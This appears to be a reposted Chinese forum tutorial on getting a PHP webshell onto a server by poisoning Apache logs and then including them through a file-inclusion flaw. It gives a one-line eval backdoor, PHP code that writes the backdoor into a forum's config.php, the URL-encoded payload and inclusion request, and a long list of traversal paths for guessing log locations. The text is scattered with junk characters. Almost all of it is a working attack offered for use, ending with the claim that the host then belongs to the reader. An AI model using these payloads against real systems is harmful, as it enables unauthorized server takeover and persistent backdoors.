php包含apache日志写马

admin

因为上面那个很不实际，我在测试中发现日志动不动就是几十兆，那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用，也比上面那种慢的要死好很多。

比如还是这句一句话木马
<?eval($_POST[cmd]);?>   
# a- f; k2 m# ~- Y7 X( Z
' r% Z6 k& \! n4 A到这里你也许就想到了，这是个很不错的办法。接着看,如何写入就成了个问题，用这句，
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件，然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是

2 L# C- h- ]# S5 r2 p- x2 m0 k<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
% W: L' o3 A3 n  Kfclose($fp);?>   //在config.php里写入一句木马语句
8 m% h( ~+ W  j: O5 a. }) `
& |, e& V! q$ Y& J' V% h5 S+ Y$ j. T我们提交这句，再让Apache记录到错误日志里，再包含就成功写入shell,记得一定要转换成URL格式才成功。
% ^# j) F: m2 {# @6 K4 m转换为
' m! M/ ]9 T, e. I4 P5 a%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
/ B! o$ k! U  lconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我们提交
" J/ J: v$ G/ s  {http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
+ l+ B5 A0 t1 C" x' `5 r( Q7 ?0 a# V9 e%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

这样就错误日志里就记录下了这行写入webshell的代码。
- W' m2 V3 |! _* O我们再来包含日志，提交
# T1 j& s; M+ Mhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
3 y9 Q& v8 @# `( y/ [9 `
! c; o6 |  G% u; t' _+ s* ~9 ~$ H这样webshell就写入成功了，config.php里就写入一句木马语句
OK.
http://www.xxx.com/forum/config.php这个就成了我们的webshell
直接用lanker的客户端一连，主机就是你的了。
3 Y2 s6 s$ d! l6 q" H6 _! h: A$ a
5 k. {3 p% Z4 L  k0 M# }0 B* n  HPS:上面讲的，前提是文件夹权限必须可写 ，一定要-rwxrwxrwx(777)才能继续，这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用

其他的日志路径，你可以去猜，也可以参照这里。
) p; U. j% R+ h: |- L" n( u! J% B../../../../../../../../../../var/log/httpd/access_log
2 j7 M$ W0 x+ L' b../../../../../../../../../../var/log/httpd/error_log
6 K  v1 A2 i8 ~, u9 {2 E../apache/logs/error.log
9 {5 G  |5 E1 F/ x8 M) D../apache/logs/access.log
; n' q- u8 w6 Q- _; J% q4 ^../../apache/logs/error.log
7 R6 A# Q- V# P$ i4 N../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
( _6 c7 q9 ]: f../../../../../../../../../../etc/httpd/logs/acces.log
& E3 O% R: d) ~$ S8 E: `3 W) l../../../../../../../../../../etc/httpd/logs/error_log
& l, F, c) Y$ j  ]3 I) f. ]../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
; `5 x8 F6 d6 ^  ?8 T1 a9 G../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
6 C2 O" M9 X, ^+ v../../../../../../../../../../usr/local/apache/logs/access.log
6 `# F# ~" S, a6 c7 m$ _% A../../../../../../../../../../var/log/apache/access_log
5 Y; I9 V$ H( @/ \* N; f+ I../../../../../../../../../../var/log/apache/access.log
& w. y! @; P* @, Z, \  t../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
" J, A4 w& e0 t! q: q: l8 h# ~3 E../../../../../../../../../../var/www/logs/error.log
/ b" J5 M9 v- D: t2 T- f../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
! t3 e5 h( [9 N' V../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log      
/var/log/httpd/error_log     
! p& Q2 s; t; s1 T8 i../apache/logs/error.log     
- s, m3 \8 y7 ^7 g2 U( W$ c../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
7 R% X! `1 L- @" T) Y6 y5 O/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
$ \' R4 Q8 Y" `0 d. h/ [/etc/httpd/logs/error_log
; `' C, [- Z" L0 x  K( g# _$ E/etc/httpd/logs/error.log
$ u- L/ A1 O' \* F: S+ j9 f/var/www/logs/access_log
/var/www/logs/access.log
# q/ o6 a: }% v/ @; Z) R& N+ z/usr/local/apache/logs/access_log
0 ]9 Q, ^4 v7 J7 k/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
3 M. [, L5 W: I: X# J( E/var/log/access_log
/var/www/logs/error_log
9 m1 [' H* Z. d5 B3 l5 m/ A8 W, r/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
. M& e( v1 @# f1 [0 B0 ]/var/log/error_log